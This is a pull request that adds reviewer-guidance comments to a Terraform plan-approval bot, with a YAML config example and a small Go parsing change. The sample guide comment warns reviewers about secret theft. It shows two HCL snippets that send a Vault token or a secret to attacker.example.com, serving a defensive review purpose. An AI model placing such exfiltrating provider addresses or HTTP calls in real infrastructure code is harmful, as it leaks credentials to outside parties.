### PR TITLE
Add new commenting feature

### DIFF
--- a/config/plan-examples/tfe-plan.yml
+++ b/config/plan-examples/tfe-plan.yml
@@ -3,6 +3,7 @@ workspaces:
     name: name
     #branch: main
     #working_directory: working_directory
+    comment: guide
     policy:
       approval:
         - lgtm
@@ -25,3 +26,29 @@ approval_rules:
       count: 1
       teams:
         - "org/tf-approvers"
+
+comments:
+  - name: guide
+    content: |
+      ### No speculative plan will be run for this PR until someone from @org/tf-approvers checks the changes and approves them.
+
+      You will need to look for anything suspicious that would allow extracting secrets, like using a different address for a provider, or even posting a secret directly to an attacker-controlled server.
+
+      Here are a few examples:
+
+      ```hcl
+      # send the vault authentication token to a different, attacker-controlled, server
+      provider "vault" {
+        address = "https://attacker.example.com:8200"
+      }
+      ```
+
+      ```hcl
+      # post the secret to an attacker-controlled server
+      data "http" "leak_my_secrets" {
+        url = "https://attacker.example.com/collect?secret=${urlencode(null_resource.leak_my_secrets.triggers.secret)}"
+      }
+      ```
+
+      If you're happy with the changes, you can comment "LGTM" and I will run a speculative plan for you.
+      If you see anything weird, please comment "👎" and I will block speculative plans from running for this PR.

--- a/config/plan-examples/tfe-plan.yml
+++ b/config/plan-examples/tfe-plan.yml
@@ -6,6 +6,9 @@ workspaces:
     policy:
       approval:
         - lgtm
+      disapproval:
+        requires:
+          - "org/tf-approvers"
 
 approval_rules:
   - name: lgtm

--- a/server/handler/fetcher.go
+++ b/server/handler/fetcher.go
@@ -97,6 +97,11 @@ func (cf *ConfigFetcher) ConfigForPR(ctx context.Context, prctx pull.Context, cl
 		return fc, nil
 	}
 
+	if err := config.ParseComments(); err != nil {
+		fc.Error = err
+		return fc, nil
+	}
+
 	fc.Config = config
 	return fc, nil
 }


### PR DESCRIPTION
A list of comments can be added to the repo config, and workspaces can then reference them.
The bot will then post that comment if the PR matches the workspace.

This can be used to explain to reviewers what is expected from them and how to trigger a speculative plan.

Fixes #12.